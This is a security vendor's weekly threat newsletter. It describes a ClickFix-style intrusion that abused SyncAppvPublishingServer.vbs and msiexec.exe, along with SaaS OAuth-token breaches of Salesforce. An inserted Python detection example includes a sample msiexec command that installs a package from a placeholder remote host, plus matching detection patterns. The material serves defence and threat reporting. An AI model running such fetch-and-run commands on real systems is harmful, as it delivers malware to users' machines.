Blackpoint SOC Threat Pulse: Week of June 22, 2026

In this week’s Threat Pulse, discover how attackers used a legitimate Windows script to hide in plain sight, and how the Blackpoint Security Operations Center (SOC) isolated the incident. The Adversary Pursuit Group (APG) shares their quick take on SaaS integration abuse and why it’s occurring within cloud and application layers.

What we’re seeing 

  • The Blackpoint SOC alerted to suspicious msiexec.exe usage by a user; further investigation determined initial access was likely a ClickFix-style attack.  
  • The malicious execution proxied through the legitimate system script SyncAppvPublishingServer.vbs in an attempt to evade detection. 
  • The execution originated from a scheduled task designed to rerun the beacon command, giving the attacker a consistent method of persistence.
  • The command in question used msiexec.exe to retrieve and execute a second-stage payload from remotely hosted attacker infrastructure, determined to be UltraFinder, a tool used to find files on the system.
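The two behaviours above (a child process of SyncAppvPublishingServer.vbs, and msiexec.exe pulling its package from a remote URL) can be flagged in process-creation telemetry. The following is an added detection example, not Blackpoint's code; the Sysmon-style field names, the sample events and the placeholder host are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Sysmon-style process-creation fields (field names are an assumption of this example)
@dataclass
class ProcEvent:
    image: str
    command_line: str
    parent_image: str
    parent_command_line: str

PROXY_SCRIPT = "syncappvpublishingserver.vbs"
REMOTE_URL = re.compile(r"\bhttps?://\S+", re.IGNORECASE)

def suspicious_reasons(ev: ProcEvent) -> list[str]:
    """Return the indicators matched by one event; an empty list means nothing fired."""
    reasons = []
    if PROXY_SCRIPT in ev.parent_command_line.lower():
        # Any child of the App-V publishing script is proxy execution of an arbitrary command.
        reasons.append("parent is SyncAppvPublishingServer.vbs (LOLBin proxy execution)")
    if ev.image.lower().endswith("msiexec.exe") and REMOTE_URL.search(ev.command_line):
        # Legitimate deployments normally install from a local path or share, not a URL.
        reasons.append("msiexec.exe installing a package from a remote URL")
    return reasons

def scan(events: list[ProcEvent]) -> list[tuple[ProcEvent, list[str]]]:
    """Return every event that matched at least one indicator, with its reasons."""
    return [(ev, r) for ev in events if (r := suspicious_reasons(ev))]

# Constructed sample events; the host and paths are placeholders, not real infrastructure.
SAMPLE_EVENTS = [
    ProcEvent(  # routine software deployment: local package, parent is a deployment agent
        image=r"C:\Windows\System32\msiexec.exe",
        command_line=r'msiexec.exe /i "C:\ProgramData\deploy\agent.msi" /qn',
        parent_image=r"C:\Program Files\DeployAgent\agent.exe",
        parent_command_line=r'"C:\Program Files\DeployAgent\agent.exe" --install',
    ),
    ProcEvent(  # pattern from this Threat Pulse: msiexec launched through the App-V script
        image=r"C:\Windows\System32\msiexec.exe",
        command_line="msiexec.exe /i https://payload.example.invalid/update.msi /qn",
        parent_image=r"C:\Windows\System32\wscript.exe",
        parent_command_line=r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "<arguments omitted>"',
    ),
]

if __name__ == "__main__":
    for ev, reasons in scan(SAMPLE_EVENTS):
        print(ev.image, "->", "; ".join(reasons))
```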

What the Blackpoint SOC did 

  • The Blackpoint SOC isolated the impacted host to prevent further access and malicious activity.  
  • The Blackpoint SOC conducted further investigation to identify potential lateral movement or other activity, finding none.  

Why this matters 

  • Without quick intervention, this could have led to a higher-impact compromise, including data theft, malware deployment, and widespread access.
  • ClickFix-style attacks have continued to increase as threat actors turn to convincing social engineering tactics for initial access. 

BROC Weekly Snapshot 

What changed. What didn’t. What matters. 

Incidents Observed: >95 ↓
Pre-Payload Disruptions: 93% ↑
Pre-Ransom Interruptions: 2% ↑

Campaign Statuses 

Fake CAPTCHA/ClickFix   Escalating   47% 
Rogue RMM   Ongoing   12% 
SSL VPN Compromise   Ongoing   7% 
Trojanized Installers   Ongoing   2% 

Quick Take 

The Blackpoint APG is actively tracking a series of breaches against Salesforce customers, with the latest being attributed to Icarus, an emerging extortion group identified in April 2026. The threat actors reportedly abused a third-party application integration through Klue’s Battlecards application and gained access to Salesforce instances using Klue OAuth tokens.  

The threat group then exfiltrated sensitive data; however, the overall scope of the data access and exfiltration is still under investigation. Additionally, the group maintains a data leak site used to pressure targeted victims. This incident follows a pattern established by other threat groups, including ShinyHunters and UNC6395, which were reported to target Salesforce instances throughout 2025 and into 2026.

The recurring compromise of Salesforce-connected applications highlights a broader shift toward SaaS integration abuse, where attackers leverage trusted OAuth relationships to access business-critical data without requiring endpoint execution or traditional malware deployment. These attacks often occur entirely within cloud and application layers, reducing the visibility available to security teams that primarily monitor endpoints and network activity. 

DATE PUBLISHED: June 23, 2026
AUTHOR: Blackpoint Cyber
